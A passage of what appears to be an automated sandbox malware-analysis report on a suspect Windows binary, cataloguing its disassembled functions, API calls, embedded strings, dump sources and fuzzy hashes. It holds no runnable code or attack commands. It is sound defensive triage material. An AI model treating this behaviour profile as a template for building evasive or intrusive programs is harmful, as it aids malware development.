                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00534F01
                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00534F2B
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00534F70
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00534FB6
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534FCA
                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534FEB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4176008265-0
                                                                                  • Opcode ID: afa9a85b98b240451e8593ebd42d098c2136d0b6c7aca016858f5b7462807a7f
                                                                                  • Instruction ID: 1a13c710b744e160c6ca71c76fbf20f04da18a3fa5fe6e592a5a6cd7a6893829
                                                                                  • Opcode Fuzzy Hash: afa9a85b98b240451e8593ebd42d098c2136d0b6c7aca016858f5b7462807a7f
                                                                                  • Instruction Fuzzy Hash: E1618B71900289AFDB21DFA4D888AAE7FB8FB45308F180559F846A7251E731BD45EF21
                                                                                  Function 00559C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00559C98
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00559C9B
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00559CBF
                                                                                  • _memset.LIBCMT ref: 00559CD0
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00559CE2
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00559D5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 830647256-0
                                                                                  • Opcode ID: d4ec49dc63c2eb22d28a2ad065e8234c25dc5d63056a4525a0720b39e39dd1de
                                                                                  • Instruction ID: f6e0e8202e881def161a8b47a7a3a2bd9412f216e1152c5faab0a62ea348b587
                                                                                  • Opcode Fuzzy Hash: d4ec49dc63c2eb22d28a2ad065e8234c25dc5d63056a4525a0720b39e39dd1de
                                                                                  • Instruction Fuzzy Hash: 43616975900208EFDB10DFA8CC91EEEBBB8FB09714F14415AFE05AB291D774A949DB60
                                                                                  Function 005294E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 005294FE
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00529549
                                                                                  • VariantInit.OLEAUT32(?), ref: 0052955B
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0052957B
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 005295BE
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 005295D2
                                                                                  • VariantClear.OLEAUT32(?), ref: 005295E7
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 005295F4
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005295FD
                                                                                  • VariantClear.OLEAUT32(?), ref: 0052960F
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0052961A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: d2db1d2f717109ee99e7a8de75a65143902f36adafb0941366049f44048530e1
                                                                                  • Instruction ID: 13e09f98ccdeacd309603a9d81e745ab092b6e15acd6ed4195b845f5d9f8d4bf
                                                                                  • Opcode Fuzzy Hash: d2db1d2f717109ee99e7a8de75a65143902f36adafb0941366049f44048530e1
                                                                                  • Instruction Fuzzy Hash: 2C414231E00219AFCF01EFA4E8489DEBFB9FF59354F008065E505A3251DB71EA85DBA1
                                                                                  Function 0054BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?Z$|?Z
                                                                                  • API String ID: 2862541840-3093284752
                                                                                  • Opcode ID: bb70eef9b0ff67422b8a04f5352d381f9f68fd9b114b68ca4883c588543a8192
                                                                                  • Instruction ID: 1c9a6e91252cd5241cf331e8889b6c6567b8a3ed37f72d318fe402d053a8328a
                                                                                  • Opcode Fuzzy Hash: bb70eef9b0ff67422b8a04f5352d381f9f68fd9b114b68ca4883c588543a8192
                                                                                  • Instruction Fuzzy Hash: 70914C71E00215ABEF248FA5D888FEEBBB8FF85718F108559F515AB280D770D944CBA0
                                                                                  Function 0054ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • CoInitialize.OLE32 ref: 0054ADF6
                                                                                  • CoUninitialize.OLE32 ref: 0054AE01
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0057D8FC,?), ref: 0054AE61
                                                                                  • IIDFromString.OLE32(?,?), ref: 0054AED4
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054AF6E
                                                                                  • VariantClear.OLEAUT32(?), ref: 0054AFCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 834269672-1287834457
                                                                                  • Opcode ID: b24c01ce5502cf6e7f1b46f5eadeb94292bba6f5aab39f514dc9619bdae52029
                                                                                  • Instruction ID: bc2eacc62a5241fdcaa006663a0b1164336d4e043c0565b07ad6b27ba162fbdb
                                                                                  • Opcode Fuzzy Hash: b24c01ce5502cf6e7f1b46f5eadeb94292bba6f5aab39f514dc9619bdae52029
                                                                                  • Instruction Fuzzy Hash: F3619871248311AFD710DF54D888BAEBBE8BF89708F004809F9859B291D770ED48DB93
                                                                                  Function 00548107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00548168
                                                                                  • inet_addr.WSOCK32(?,?,?), ref: 005481AD
                                                                                  • gethostbyname.WSOCK32(?), ref: 005481B9
                                                                                  • IcmpCreateFile.IPHLPAPI ref: 005481C7
                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00548237
                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0054824D
                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 005482C2
                                                                                  • WSACleanup.WSOCK32 ref: 005482C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                  • String ID: Ping
                                                                                  • API String ID: 1028309954-2246546115
                                                                                  • Opcode ID: 417a1714a3540d00f2d93695262a74f66b2844bb6cabe7010e09aa9868d4a8f6
                                                                                  • Instruction ID: 1a4d6b14ccb5d52b83ff186fe826b85afb3634a25bd3f5fccb5d1ae6d05449b2
                                                                                  • Opcode Fuzzy Hash: 417a1714a3540d00f2d93695262a74f66b2844bb6cabe7010e09aa9868d4a8f6
                                                                                  • Instruction Fuzzy Hash: C351CE356046019FD720AF24DC49B7EBBE4FF48314F04886AFA5A9B2A0DB70E804DB51
                                                                                  Function 00559E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00559E5B
                                                                                  • CreateMenu.USER32 ref: 00559E76
                                                                                  • SetMenu.USER32(?,00000000), ref: 00559E85
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00559F12
                                                                                  • IsMenu.USER32(?), ref: 00559F28
                                                                                  • CreatePopupMenu.USER32 ref: 00559F32
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00559F63
                                                                                  • DrawMenuBar.USER32 ref: 00559F71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 176399719-4108050209
                                                                                  • Opcode ID: caf8dfba9764f792c68d89850a11c25c732138fe0031355ad1a8407287c46b89
                                                                                  • Instruction ID: 71238b7273eb207ea728bd09713c937fe95262c78151d1389584e5f246da11a2
                                                                                  • Opcode Fuzzy Hash: caf8dfba9764f792c68d89850a11c25c732138fe0031355ad1a8407287c46b89
                                                                                  • Instruction Fuzzy Hash: E34165B4A00209EFDB11CF64E854BEABBB5FF58305F14412AED4AA7360D734A958DF60
                                                                                  Function 0053E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053E396
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0053E40C
                                                                                  • GetLastError.KERNEL32 ref: 0053E416
                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0053E483
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  • Opcode ID: fc9974e01f57be21842e795e08d3a5a0fd1520ec3cb91509db5f9ff54ed2b155
                                                                                  • Instruction ID: c269f7bf61369bb3acfdf81bb70a5f6c68d99638c43ac48fc9bde7aa0c180305
                                                                                  • Opcode Fuzzy Hash: fc9974e01f57be21842e795e08d3a5a0fd1520ec3cb91509db5f9ff54ed2b155
                                                                                  • Instruction Fuzzy Hash: 5131A135A00209AFCB00EB64D986ABDBFF4FF49304F14842AF505AB2D1D770AE42DB91
                                                                                  Function 0052B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0052B98C
                                                                                  • GetDlgCtrlID.USER32 ref: 0052B997
                                                                                  • GetParent.USER32 ref: 0052B9B3
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0052B9B6
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0052B9BF
                                                                                  • GetParent.USER32(?), ref: 0052B9DB
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0052B9DE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1383977212-1403004172
                                                                                  • Opcode ID: 987d480a08bd0f28bc25e9a1db9256dd9255492fb3c16ea532ed6a22466c9252
                                                                                  • Instruction ID: 806a10e09a3f260648f5de146f2779635ab5cfcef691eb9daa5c2a651a6e2893
                                                                                  • Opcode Fuzzy Hash: 987d480a08bd0f28bc25e9a1db9256dd9255492fb3c16ea532ed6a22466c9252
                                                                                  • Instruction Fuzzy Hash: C221D674A00108BFDB04ABA4EC86EBEBB75FF56310F10011AF655A32D1DBB95859EB30
                                                                                  Function 0052B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0052BA73
                                                                                  • GetDlgCtrlID.USER32 ref: 0052BA7E
                                                                                  • GetParent.USER32 ref: 0052BA9A
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0052BA9D
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0052BAA6
                                                                                  • GetParent.USER32(?), ref: 0052BAC2
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0052BAC5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1383977212-1403004172
                                                                                  • Opcode ID: d2126a9a0e65a47d494a98b87c2ff6636a1c1bccaa747a8723ed8cb33fe8848c
                                                                                  • Instruction ID: af577f591e39159b2c9e88cac21592b0b39746167603cd8975ca546e6fbf0652
                                                                                  • Opcode Fuzzy Hash: d2126a9a0e65a47d494a98b87c2ff6636a1c1bccaa747a8723ed8cb33fe8848c
                                                                                  • Instruction Fuzzy Hash: 8921C175A00108BFDB00AB64EC85EBEBB75FF46300F00001AF551A31D1DBB95859AB20
                                                                                  Function 0052BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 0052BAE3
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 0052BAF8
                                                                                  • _wcscmp.LIBCMT ref: 0052BB0A
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0052BB85
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 1704125052-3381328864
                                                                                  • Opcode ID: d93118baa2aafdfdfe4c50eca39bce524db454d5c7821f7c28fe2595541e10f2
                                                                                  • Instruction ID: d6d2793094f7a2fd274cddc26fae1b5748384305e56d61b54731cf4e381089de
                                                                                  • Opcode Fuzzy Hash: d93118baa2aafdfdfe4c50eca39bce524db454d5c7821f7c28fe2595541e10f2
                                                                                  • Instruction Fuzzy Hash: 6811CA76648327FBFA246A24FC0BDAA7FADBF63724F200011F909E50D5EBE158916524
                                                                                  Function 0054B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054B2D5
                                                                                  • CoInitialize.OLE32(00000000), ref: 0054B302
                                                                                  • CoUninitialize.OLE32 ref: 0054B30C
                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 0054B40C
                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 0054B539
                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0054B56D
                                                                                  • CoGetObject.OLE32(?,00000000,0057D91C,?), ref: 0054B590
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 0054B5A3
                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0054B623
                                                                                  • VariantClear.OLEAUT32(0057D91C), ref: 0054B633
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 2395222682-0
                                                                                  • Opcode ID: 4e8aa12fad693467a9d358c2082cc176b46d9743ba702181561b86bb47d030e4
                                                                                  • Instruction ID: 6fd8e257ffdc71818df3f846c22545ebcc582da3972ea508eddda31589609230
                                                                                  • Opcode Fuzzy Hash: 4e8aa12fad693467a9d358c2082cc176b46d9743ba702181561b86bb47d030e4
                                                                                  • Instruction Fuzzy Hash: 6BC10271608305AFD700DF69C8849ABBBF9BF88308F04495DF98A9B251DB71ED05CB62
                                                                                  Function 0051ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0051ACC1
                                                                                    • Part of subcall function 00517CF4: __mtinitlocknum.LIBCMT ref: 00517D06
                                                                                    • Part of subcall function 00517CF4: EnterCriticalSection.KERNEL32(00000000,?,00517ADD,0000000D), ref: 00517D1F
                                                                                  • __calloc_crt.LIBCMT ref: 0051ACD2
                                                                                    • Part of subcall function 00516986: __calloc_impl.LIBCMT ref: 00516995
                                                                                    • Part of subcall function 00516986: Sleep.KERNEL32(00000000,000003BC,0050F507,?,0000000E), ref: 005169AC
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0051ACED
                                                                                  • GetStartupInfoW.KERNEL32(?,005A6E28,00000064,00515E91,005A6C70,00000014), ref: 0051AD46
                                                                                  • __calloc_crt.LIBCMT ref: 0051AD91
                                                                                  • GetFileType.KERNEL32(00000001), ref: 0051ADD8
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0051AE11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 1426640281-0
                                                                                  • Opcode ID: ee37788e1f6fdf44e39a95b3aa257f17c6055332ffadc4a377f4d94a8a993320
                                                                                  • Instruction ID: 54ff533d084f9f8ffe8f705a1c108ca2d386ffac2e62010aa4ae2e154be183c8
                                                                                  • Opcode Fuzzy Hash: ee37788e1f6fdf44e39a95b3aa257f17c6055332ffadc4a377f4d94a8a993320
                                                                                  • Instruction Fuzzy Hash: 2181DF709022458FEB21CF68C8845E9BFF4BF45320B24475DE4A6AB3D1C7349883DB52
                                                                                  Function 00534025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00534047
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005330A5,?,00000001), ref: 0053405B
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00534062
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 00534071
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00534083
